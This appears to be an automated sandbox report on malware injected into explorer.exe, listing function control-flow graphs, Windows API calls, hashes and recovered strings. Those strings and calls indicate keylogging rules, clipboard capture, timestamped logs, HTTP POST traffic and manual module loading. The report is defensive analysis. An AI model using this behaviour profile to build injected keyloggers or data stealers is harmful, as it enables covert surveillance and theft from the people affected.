                                                                        • Instruction ID: af3d5cc725e3ea5d6a26b380ee9a8f3ba40a2bc69890fe8cfb03977bb5fc56cd
                                                                        • Opcode Fuzzy Hash: 9c6f7c85dcfe515bec4937543dfdece2a9f4dae248fbdda46fa9b6d7ef03c15e
                                                                        • Instruction Fuzzy Hash: 88115272409200EFDB15DFA0AD4DB6EBFB4EF46B11F040469FA4692150D7348A4A8BA7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 a320a1-a320fc call a3240f call a32a09 call a3298a call a324cc 303 a32117-a32123 294->303 304 a320fe-a32115 294->304 307 a32127-a32129 303->307 304->307 308 a3212f-a32166 RtlZeroMemory 307->308 309 a323fd-a3240c call a329eb 307->309 313 a323f5-a323fc 308->313 314 a3216c-a32187 308->314 313->309 315 a321b9-a321cb 314->315 316 a32189-a3219a call a3243d 314->316 323 a321cf-a321d1 315->323 321 a321ad 316->321 322 a3219c-a321ab 316->322 324 a321af-a321b7 321->324 322->324 325 a323e2-a323e8 323->325 326 a321d7-a32233 call a3288d 323->326 324->323 329 a323f1 325->329 330 a323ea-a323ec call a329eb 325->330 334 a323db 326->334 335 a32239-a3223e 326->335 329->313 330->329 334->325 336 a32240-a32251 335->336 337 a32258-a32286 call a32a09 wsprintfW 335->337 336->337 340 a32288-a3228a 337->340 341 a3229f-a322b6 337->341 342 a3228b-a3228e 340->342 346 a322f5-a3230f 341->346 347 a322b8-a322ee call a32a09 wsprintfW 341->347 344 a32290-a32295 342->344 345 a32299-a3229b 342->345 344->342 348 a32297 344->348 345->341 352 a32315-a32328 346->352 353 a323b8-a323ce call a329eb 346->353 347->346 348->341 352->353 357 a3232e-a32344 call a32a09 352->357 360 a323d0-a323d2 call a329eb 353->360 361 a323d7 353->361 364 a32346-a32351 357->364 360->361 361->334 365 a32353-a32360 call a329ce 364->365 366 a32365-a3237c 364->366 365->366 370 a32380-a3238d 366->370 371 a3237e 366->371 370->364 372 a3238f-a32393 370->372 371->370 373 a32395 372->373 374 a323ad-a323b4 call a329eb 372->374 375 a32395 call a329bd 373->375 374->353 377 a3239a-a323a7 RtlMoveMemory 375->377 377->374
                                                                        APIs
                                                                          • Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                          • Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                          • Part of subcall function 00A3298A: lstrlen.KERNEL32(00A34FE2,?,00000000,00000000,00A320DD,74DE8A60,00A34FE2,00000000), ref: 00A32992
                                                                          • Part of subcall function 00A3298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00A34FE2,00000001,00000000,00000000), ref: 00A329A4
                                                                          • Part of subcall function 00A324CC: RtlZeroMemory.NTDLL(?,00000018), ref: 00A324DE
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00A32139
                                                                        • wsprintfW.USER32 ref: 00A32272
                                                                        • wsprintfW.USER32 ref: 00A322DD
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A323A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 9596f31e201dca1a39c9e640bb1a3ec281874a8e21116124bb836a10a544fc8d
                                                                        • Instruction ID: 08ea0f9524fcdc0867b6c73377d3dcfcf738d66a11811432abbb976dad8511ad
                                                                        • Opcode Fuzzy Hash: 9596f31e201dca1a39c9e640bb1a3ec281874a8e21116124bb836a10a544fc8d
                                                                        • Instruction Fuzzy Hash: C8A16971609344AFDB10DFA8DD85B6BBBE8EF88740F00092DF985C7251DA74DA058B52

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 379 a312ae-a312bf 380 a313a6-a313ad 379->380 381 a312c5-a312c7 379->381 381->380 382 a312cd-a312cf 381->382 383 a312d4 call a329bd 382->383 384 a312d9-a312fc lstrlen call a32a09 383->384 387 a3136e-a31377 call a329eb 384->387 388 a312fe-a31327 call a32841 RtlZeroMemory 384->388 393 a31379-a3137d 387->393 394 a3139d-a313a5 call a329ae 387->394 395 a31353-a31369 RtlMoveMemory call a32569 388->395 396 a31329-a3134f RtlMoveMemory call a32569 388->396 398 a3137f-a31392 call a3255c PathMatchSpecA 393->398 394->380 395->387 396->388 405 a31351 396->405 406 a31394-a31397 398->406 407 a3139b 398->407 405->387 406->398 408 a31399 406->408 407->394 408->394
                                                                        APIs
                                                                          • Part of subcall function 00A329BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,00A312D9,00000000,00000000,?,00000001), ref: 00A329C7
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 00A312DC
                                                                          • Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                          • Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00A3138A
                                                                          • Part of subcall function 00A32841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00A31119,00000001), ref: 00A32850
                                                                          • Part of subcall function 00A32841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00A31119,00000001), ref: 00A32855
                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00A31316
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A31332
                                                                          • Part of subcall function 00A32569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00A3136E), ref: 00A32591
                                                                          • Part of subcall function 00A32569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 00A3259A
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A3135F
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                        • String ID:
                                                                        • API String ID: 2993730741-0
                                                                        • Opcode ID: 1eaac29aa3249e86b1ebbbe2db386e5fe19f1f8be88fd4c936db8603869f351a
                                                                        • Instruction ID: bd11a3d679c108d47adcd52470141a9320949e67ce78dd95a3f2806e9c8ea787
                                                                        • Opcode Fuzzy Hash: 1eaac29aa3249e86b1ebbbe2db386e5fe19f1f8be88fd4c936db8603869f351a
                                                                        • Instruction Fuzzy Hash: D2219F71B082019F8744EF689995A7FB7DAAB84700F10053EFC56D7741DB34DD0A8BA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 a31581-a31592 411 a31624-a31628 409->411 412 a31598-a3159b 409->412 413 a315a7-a315b3 GlobalLock 412->413 414 a3159d-a315a0 412->414 416 a31623 413->416 417 a315b5-a315b9 413->417 414->413 415 a315a2-a315a5 414->415 415->411 415->413 416->411 418 a315bb-a315be 417->418 419 a315e9 417->419 420 a315c0-a315c3 418->420 421 a315e4-a315e7 418->421 422 a315eb-a315f2 call a3293e 419->422 423 a315c5-a315e2 lstrlenW call a32a09 lstrcatW 420->423 424 a315f4-a315fd call a32724 420->424 421->422 422->424 423->424 431 a3161b-a31622 GlobalUnlock 424->431 432 a315ff-a31608 lstrlenW 424->432 431->416 432->431 433 a3160a-a3160e 432->433 434 a3160f call a316b9 433->434 435 a31614-a31616 call a329eb 434->435 435->431
                                                                        APIs
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00A315A9
                                                                        • lstrlenW.KERNEL32(00000000), ref: 00A315C6
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00A315DC
                                                                        • lstrlenW.KERNEL32(00000000), ref: 00A31600
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A3161C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                        • String ID:
                                                                        • API String ID: 1114890469-0
                                                                        • Opcode ID: 9218e5bfb1d459478291c598519838cc7ed2026a1bc22df67c98d23357822838
                                                                        • Instruction ID: b0b7e83769a51bb7b71dee6631351e2566d5716cfb21129c56c2bd621c2ea879
                                                                        • Opcode Fuzzy Hash: 9218e5bfb1d459478291c598519838cc7ed2026a1bc22df67c98d23357822838
                                                                        • Instruction Fuzzy Hash: A7019633A041115B9A29A7F96D9A6BEB2AE9FD6711F08403AF80793211DF298D034790

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 437 a31bbd-a31bd2 438 a31c06-a31c0e 437->438 439 a31bd4 437->439 441 a31c10-a31c15 438->441 442 a31c69-a31c71 438->442 440 a31bd6-a31c04 RtlMoveMemory 439->440 440->438 440->440 445 a31c64-a31c67 441->445 443 a31c73-a31c85 442->443 444 a31cb1 442->444 443->444 447 a31c87-a31ca4 LdrProcessRelocationBlock 443->447 448 a31cb3-a31cb8 444->448 445->442 446 a31c17-a31c2a LoadLibraryA 445->446 449 a31c30-a31c35 446->449 450 a31cbb-a31cbd 446->450 447->444 451 a31ca6-a31caa 447->451 452 a31c5c-a31c5f 449->452 450->448 451->444 453 a31cac-a31caf 451->453 454 a31c61 452->454 455 a31c37-a31c3b 452->455 453->444 453->447 454->445 456 a31c42-a31c45 455->456 457 a31c3d-a31c40 455->457 458 a31c47-a31c51 GetProcAddress 456->458 457->458 458->450 459 a31c53-a31c59 458->459 459->452
                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00A31BF4
                                                                        • LoadLibraryA.KERNEL32(?,00A35848,00000000,00000000,74DF2EE0,00000000,00A319B6,?,?,?,00000001,?,00000000), ref: 00A31C1C
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00A31C49
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00A31C9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: 12ea088edd44dc9eb5037b220de9201965e4dc6f53d50bafdc1e366d585f9081
                                                                        • Instruction ID: 47741dbc5f22f95ea9c58586f4142d60f834606b97270c5348a48209e13979f6
                                                                        • Opcode Fuzzy Hash: 12ea088edd44dc9eb5037b220de9201965e4dc6f53d50bafdc1e366d585f9081
                                                                        • Instruction Fuzzy Hash: 8C316E72744616ABCB18CF2ACCC4B66B7A8FF15315F18952DF846C7600D735E846CBA0
                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(00A3582C), ref: 00A31839
                                                                        • lstrlenW.KERNEL32 ref: 00A31845
                                                                        • RtlLeaveCriticalSection.NTDLL(00A3582C), ref: 00A318A9
                                                                        • Sleep.KERNEL32(00007530), ref: 00A318B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                        • String ID:
                                                                        • API String ID: 2134730579-0
                                                                        • Opcode ID: 4a3260ac7b994b99ce0325743e4322bb9b5b9329cf0c2f75765644371468818e
                                                                        • Instruction ID: 3552300e3e558e74453f273c06428e60eaed3683ef0e28897fac7eba86a4b227
                                                                        • Opcode Fuzzy Hash: 4a3260ac7b994b99ce0325743e4322bb9b5b9329cf0c2f75765644371468818e
                                                                        • Instruction Fuzzy Hash: 6701D631D15500AFD72CE7F9EE5AA7E3AA9EB42700B000028F0018B261DF35CE02DBA2
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,00A311DD), ref: 00A326DB
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 00A326ED
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 00A32700
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00A32716
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 331459951-0
                                                                        • Opcode ID: dbb59967d7078b37f0faa9a1c7abe99ff5806c938f07bbeb569a06592a7686cc
                                                                        • Instruction ID: 051044369dcfc18d0fd2ef3ced70dc46ed572bbc0c27f31db4f07161a6ba16d7
                                                                        • Opcode Fuzzy Hash: dbb59967d7078b37f0faa9a1c7abe99ff5806c938f07bbeb569a06592a7686cc
                                                                        • Instruction Fuzzy Hash: 01F09072806218FF9B14CFE09D489BEB7BCEE06251F10026AF90093240E7305F0197A0
                                                                        APIs
                                                                          • Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
                                                                          • Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13
                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 00A317F3
                                                                        • wsprintfW.USER32 ref: 00A3181D
                                                                        Strings
                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00A31817
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_a31000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                        • API String ID: 377395780-613334611
                                                                        • Opcode ID: a65bd527413f8d063ebff0450bda2396367775b1779a6d6f3143669852cb3167
                                                                        • Instruction ID: 923d275845684fb09184fd0429a8e04d62e763495f7fd592a233e42b2dd4b807
                                                                        • Opcode Fuzzy Hash: a65bd527413f8d063ebff0450bda2396367775b1779a6d6f3143669852cb3167
                                                                        • Instruction Fuzzy Hash: E1F03772904128BACB1497D99D059FFB2FCEB0C702F00015AFA41D1180E6785A90D3B5